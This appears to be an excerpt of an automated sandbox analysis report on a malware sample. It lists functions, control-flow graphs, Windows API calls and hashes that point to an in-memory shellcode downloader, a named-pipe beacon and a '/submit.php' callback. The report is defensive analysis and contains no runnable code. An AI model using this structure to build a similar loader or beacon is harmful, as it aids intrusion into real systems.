                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocCreateFileHeap$CloseErrorHandleLastMappingViewVirtualhtonl
                                                                  • String ID:
                                                                  • API String ID: 1975060083-0
                                                                  • Opcode ID: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
                                                                  • Instruction ID: 47710c7afb5b938a82dfdf16c250b0567d2000a85d5a71ccf537d66da51749a3
                                                                  • Opcode Fuzzy Hash: f2471fb311c3e2377756aaa010f3cf913a226f0250aa5b8a5f28efa326fee5ce
                                                                  • Instruction Fuzzy Hash: EBE1AF77711B4187EB24DB79E8813AA73A1FB99794F088525DB8A97B52EF3CE041C340
                                                                  Function 00991184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 460 991184-9911c0 CryptAcquireContextA 461 9911c2-9911e4 CryptAcquireContextA 460->461 462 9911e6-9911f9 call 9be020 460->462 461->462 463 99120c-991216 461->463 466 9911fb 462->466 467 9911fd-99120a CryptReleaseContext 462->467 466->467 467->463
                                                                  APIs
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 009911B8
                                                                  • CryptAcquireContextA.ADVAPI32 ref: 009911DC
                                                                  • CryptGenRandom.ADVAPI32 ref: 009911F0
                                                                  • CryptReleaseContext.ADVAPI32 ref: 00991204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Crypt$Context$Acquire$RandomRelease
                                                                  • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 685801729-4046902070
                                                                  • Opcode ID: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
                                                                  • Instruction ID: a4de32cccdd729242628740d51a5ce2f97955261742eb08a563ff8f6726b60a1
                                                                  • Opcode Fuzzy Hash: 90cbf4bc2dbe3f0299af629219f131cb96157499c0bb3907221978f56546c950
                                                                  • Instruction Fuzzy Hash: C401B131708B4182FB10CFAAF888799B765F7D8B98F848025D64987365CFB8CA49C740
                                                                  Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50pipefileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 468 401630-40168d CreateNamedPipeA 469 4016dc-4016e5 468->469 470 40168f-4016a1 ConnectNamedPipe 468->470 470->469 471 4016a3-4016a5 470->471 472 4016c6-4016cf CloseHandle 471->472 473 4016a7-4016c4 WriteFile 471->473 472->469 473->472 474 4016d1-4016da 473->474 474->471
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 2239253087-0
                                                                  • Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                                                  • Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
                                                                  • Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                                                                  • Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08
                                                                  Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 004017B9
                                                                  • SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                                                    • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                                                    • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                                                  • GetTickCount.KERNEL32 ref: 004017FC
                                                                  • CreateThread.KERNEL32 ref: 00401885
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                                                  • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                                                  • API String ID: 3660650057-1020837823
                                                                  • Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                                                  • Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
                                                                  • Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
                                                                  • Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48
                                                                  Function 0099CA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 303 99ca74-99cba2 call 9a4720 call 9a487c * 2 call 9a9768 call 9a979c * 2 call 9a9714 * 2 call 9a9768 * 2 call 9ab228 call 9a9714 * 3 call 9a979c call 9aa1e4 call 9aac00 * 2 call 99efc0 342 99cba9-99cbbe call 9a9714 call 99ede4 303->342 343 99cba4 call 9aa324 303->343 349 99cbc0 call 9aa324 342->349 350 99cbc5-99cbd3 call 99edf8 342->350 343->342 349->350 354 99cbda-99cbe1 call 99ee74 350->354 355 99cbd5 call 9aa324 350->355 359 99cbe8-99cc1b call 9a979c call 9a9714 call 9ab228 354->359 360 99cbe3 call 9aa324 354->360 355->354 368 99cc1d call 9aa324 359->368 369 99cc22-99cc56 call 9a9714 call 9aac00 call 9a9714 call 9a4394 359->369 360->359 368->369 379 99ce48-99ce6c call 9ab1e8 call 9aa324 369->379 380 99cc5c-99cc68 369->380 382 99cc6d-99cd10 call 9a9de4 call 9ab5dc call 9a9de4 call 9ab5dc * 2 call 99e720 call 9a9714 call 99e6cc 380->382 402 99cd12-99cd20 call 9a92ac 382->402 403 99cd34-99cd37 382->403 410 99cd2e-99cd31 402->410 411 99cd22-99cd2c call 9a7384 402->411 405 99cd39-99cd5c call 9a5200 call 9a9714 403->405 406 99cdb7 403->406 421 99cd5e 405->421 422 99cd63-99cd84 call 9a0b68 call 9a3870 call 9a32ec call 99efc0 405->422 408 99cdbc-99cdc8 call 99e6a0 call 99efc0 406->408 423 99cdca call 9aa324 408->423 424 99cdcf-99cdef call 9a9d28 408->424 410->403 411->403 421->422 450 99cd8e-99cd95 422->450 451 99cd86-99cd89 call 99f058 422->451 423->424 432 99cdf1 call 9aa324 424->432 433 99cdf6-99cdfe 424->433 432->433 433->379 436 99ce00-99ce08 433->436 438 99ce0a-99ce1b 436->438 439 99ce36 call 9a13c0 436->439 440 99ce1d-99ce2c call 99efa0 438->440 441 99ce2e 438->441 447 99ce3b-99ce42 439->447 445 99ce30-99ce32 440->445 441->445 445->439 449 99ce34 445->449 447->379 447->382 449->439 450->408 453 99cd97-99cdb5 call 99e6a0 call 99e720 call 99e8d4 450->453 451->450 453->408
                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • malloc.LIBCMT ref: 0099CB1E
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 009AAC00: malloc.LIBCMT ref: 009AAC50
                                                                    • Part of subcall function 009AAC00: realloc.LIBCMT ref: 009AAC5F
                                                                    • Part of subcall function 0099EFC0: GetLocalTime.KERNEL32 ref: 0099EFDF
                                                                  • malloc.LIBCMT ref: 0099CC10
                                                                  • _snprintf.LIBCMT ref: 0099CC8E
                                                                  • _snprintf.LIBCMT ref: 0099CCB6
                                                                  • free.LIBCMT ref: 0099CE4B
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A5212
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A522A
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A5748
                                                                    • Part of subcall function 009A5200: GetTickCount.KERNEL32 ref: 009A575E
                                                                    • Part of subcall function 009A5200: shutdown.WS2_32 ref: 009A577D
                                                                    • Part of subcall function 009A5200: shutdown.WS2_32 ref: 009A5792
                                                                    • Part of subcall function 009A5200: closesocket.WS2_32 ref: 009A579C
                                                                    • Part of subcall function 009A5200: free.LIBCMT ref: 009A57BC
                                                                    • Part of subcall function 009A5200: free.LIBCMT ref: 009A57D1
                                                                  • _snprintf.LIBCMT ref: 0099CCDD
                                                                    • Part of subcall function 009AA324: Sleep.KERNEL32 ref: 009AA367
                                                                    • Part of subcall function 009AA324: ExitThread.KERNEL32 ref: 009AA371
                                                                    • Part of subcall function 009AA324: CreateThread.KERNEL32 ref: 009AA396
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTickmalloc$_snprintffree$Thread_errnoshutdown$AllocCreateExitHeapLocalSleepTime_callnewhclosesocketrealloc
                                                                  • String ID: /submit.php
                                                                  • API String ID: 864391129-1804779596
                                                                  • Opcode ID: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
                                                                  • Instruction ID: 56a5bde57ccfc82b830e410fac2a010b46cb16021ee67dd7187f22aff7d76dda
                                                                  • Opcode Fuzzy Hash: f32a6c39e735c114815da34ed31be4442a001b255392baeff4aaf8f228ef7111
                                                                  • Instruction Fuzzy Hash: 3991C03170024187DF14FFB9A8527AE3395BBD6784F904429BE4A87B96DF38C909C791
                                                                  Function 000D0128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87memoryfilenetworkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 475 d0128-d014e 478 d014f-d016b 475->478 480 d030e-d032f VirtualAlloc 478->480 481 d0171-d0174 478->481 485 d0331-d034e InternetReadFile 480->485 482 d017a 481->482 483 d0306-d0307 481->483 482->478 483->480 485->483 486 d0350-d0358 485->486 486->485 487 d035a-d0364 486->487
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE ref: 000D0328
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocFileInternetReadVirtual
                                                                  • String ID: U.;
                                                                  • API String ID: 3591508208-4213443877
                                                                  • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                                                  • Instruction ID: e093d90e11704a09136074875a9385388f860374ac695588df902a519100a8e3
                                                                  • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                                                                  • Instruction Fuzzy Hash: 66116D6034990D0BE66895AE7C9A73A11CAD7D8765F24823FB40EC33D9ED54CC83816A
                                                                  Function 000D00D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42librarynetworkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 488 d00d2-d0365 LoadLibraryA InternetOpenA call d0109 493 d036a-d0378 488->493
                                                                  APIs
                                                                  • LoadLibraryA.KERNELBASE ref: 000D00ED
                                                                  • InternetOpenA.WININET(00000000,00000000), ref: 000D0105
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InternetLibraryLoadOpen
                                                                  • String ID: wini
                                                                  • API String ID: 2559873147-1606035523
                                                                  • Opcode ID: 371bfa33e720023473f7d1b57c4fdab5f43ae4f0dd8e10e8118ab3ec3442ea05
                                                                  • Instruction ID: 3a87a5131821d0ddbc4c84022818a1b3a98ae8a190d023c930f00ac223b6326d
                                                                  • Opcode Fuzzy Hash: 371bfa33e720023473f7d1b57c4fdab5f43ae4f0dd8e10e8118ab3ec3442ea05
                                                                  • Instruction Fuzzy Hash: C1F0204051C7D92AE32D2938681A3377A89C787305F288AAFE0CBC2683C8510C4280B6
                                                                  Function 0099EC3C Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 494 99ec3c-99ec77 call 99ed34 call 9be658 499 99ec79-99ec7b 494->499 500 99ec80-99ecbf WSAIoctl 494->500 501 99ed1e-99ed32 499->501 502 99ecdc-99ece6 500->502 503 99ecc1-99ecd8 500->503 504 99ece8 502->504 505 99ed13-99ed16 call 9be5e0 502->505 503->502 507 99eced-99ecf7 504->507 508 99ed1c 505->508 509 99ecf9-99ecfc 507->509 510 99ecfe-99ed0a 507->510 508->501 509->510 511 99ed0e 509->511 510->505 512 99ed0c 510->512 511->505 512->507
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: IoctlSocketStartupclosesocket
                                                                  • String ID:
                                                                  • API String ID: 365704328-0
                                                                  • Opcode ID: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
                                                                  • Instruction ID: c6998820aeb3eb6717c5563c6d241ee598cd2f4ad0746d86bc973b69a6a7364d
                                                                  • Opcode Fuzzy Hash: 952a6e3a5161aab294e5687c842b6be410eeabfc0734eca94b1b33ec9b4c3f50
                                                                  • Instruction Fuzzy Hash: D121927270478482EB20CF28B54079AB799F7887E8F544625EE9D43B89DB3DC5458B00
                                                                  Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 513 401595-4015c5 VirtualAlloc 514 4015c7-4015c9 513->514 515 4015e0-40162c call 401563 VirtualProtect CreateThread 514->515 516 4015cb-4015de 514->516 516->514
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocCreateProtectThread
                                                                  • String ID:
                                                                  • API String ID: 3039780055-0
                                                                  • Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                                                  • Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
                                                                  • Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
                                                                  • Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708
                                                                  Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 519 401704-40175c CreateFileA 520 40179c-4017a5 519->520 521 40175e-401760 519->521 522 401781-40178f CloseHandle 521->522 523 401762-40177f ReadFile 521->523 522->520 523->522 524 401791-40179a 523->524 524->521
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleRead
                                                                  • String ID:
                                                                  • API String ID: 1035965006-0
                                                                  • Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                                                  • Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
                                                                  • Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
                                                                  • Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08
                                                                  Function 000D0109 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 525 d0109-d019f InternetConnectA call d0128 531 d014f-d016b 525->531 533 d030e-d032f VirtualAlloc 531->533 534 d0171-d0174 531->534 538 d0331-d034e InternetReadFile 533->538 535 d017a 534->535 536 d0306-d0307 534->536 535->531 536->533 538->536 539 d0350-d0358 538->539 539->538 540 d035a-d0364 539->540
                                                                  APIs
                                                                  • InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 000D0124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConnectInternet
                                                                  • String ID: U.;
                                                                  • API String ID: 3050416762-4213443877
                                                                  • Opcode ID: 6461e000310a584dadf843701745a51b7c54c1a02fe81d3d8c993301fa1bf7ef
                                                                  • Instruction ID: 6127167accb197b00c8a3c83219f0d44e8510ba1f26c2e76f8ff358ac84f4210
                                                                  • Opcode Fuzzy Hash: 6461e000310a584dadf843701745a51b7c54c1a02fe81d3d8c993301fa1bf7ef
                                                                  • Instruction Fuzzy Hash: 5C01F2503B8A882EE66C862C6C1BB3B22CDC7C5726B24D36FF14BC22C7E8408C434529
                                                                  Function 000D02EB Relevance: 3.1, APIs: 2, Instructions: 67memoryfilenetworkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 541 d02eb-d030b 543 d030e-d032f VirtualAlloc 541->543 545 d0331-d034e InternetReadFile 543->545 546 d0306-d0307 545->546 547 d0350-d0358 545->547 546->543 547->545 548 d035a-d0364 547->548
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE ref: 000D0328
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocFileInternetReadVirtual
                                                                  • String ID:
                                                                  • API String ID: 3591508208-0
                                                                  • Opcode ID: 787ed7849923a0638b55286bb4b0c9b8b3b55a8494a6a148c50ba00b0fa82116
                                                                  • Instruction ID: 08c6e0097d16fd9d5bf4d43ade2cd5ca3a3f1cf240245f266af754fa7a215f6d
                                                                  • Opcode Fuzzy Hash: 787ed7849923a0638b55286bb4b0c9b8b3b55a8494a6a148c50ba00b0fa82116
                                                                  • Instruction Fuzzy Hash: C901F56124D6CA0FD31AA6A96C613AA26D9DB59358F2800AFE04CC7287DA59CD438329
                                                                  Function 009A1458 Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtualhtonl
                                                                  • String ID:
                                                                  • API String ID: 2902677218-0
                                                                  • Opcode ID: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
                                                                  • Instruction ID: c8bcc57ae2d8a9cccb519cffa6f9d94194073d06cf5667baa168e6de9e47a6ca
                                                                  • Opcode Fuzzy Hash: 4b12a6d8d4904ce74f9c5145ffaca99b49c225ea4d5dd63d56719739f63b212b
                                                                  • Instruction Fuzzy Hash: 5F219D3271478192EB60DF26F580B9A73A4F7D9B84F449432EE8A43B19DF38C445CB80
                                                                  Function 0099E6A0 Relevance: 3.0, APIs: 2, Instructions: 8networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009AA948: RevertToSelf.ADVAPI32 ref: 009AA956
                                                                  • InternetCloseHandle.WININET ref: 0099E6B0
                                                                  • InternetCloseHandle.WININET ref: 0099E6BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleInternet$RevertSelf
                                                                  • String ID:
                                                                  • API String ID: 841312091-0
                                                                  • Opcode ID: 2ed4f708f2ae633ca0e893511461a1621bf721b5dd3249825a990886b3c25dec
                                                                  • Instruction ID: c1d9bec4808571e5fc70cceca728a23cb9ba717d618734765e5da3d29bacf2b9
                                                                  • Opcode Fuzzy Hash: 2ed4f708f2ae633ca0e893511461a1621bf721b5dd3249825a990886b3c25dec
                                                                  • Instruction Fuzzy Hash: 63D04C24A55900C3FA19BB16FD953A93324ABD6B69F114012D90F42373DF6C84D5C753
                                                                  Function 000D0294 Relevance: 1.5, APIs: 1, Instructions: 45filenetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_d0000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileInternetRead
                                                                  • String ID:
                                                                  • API String ID: 778332206-0
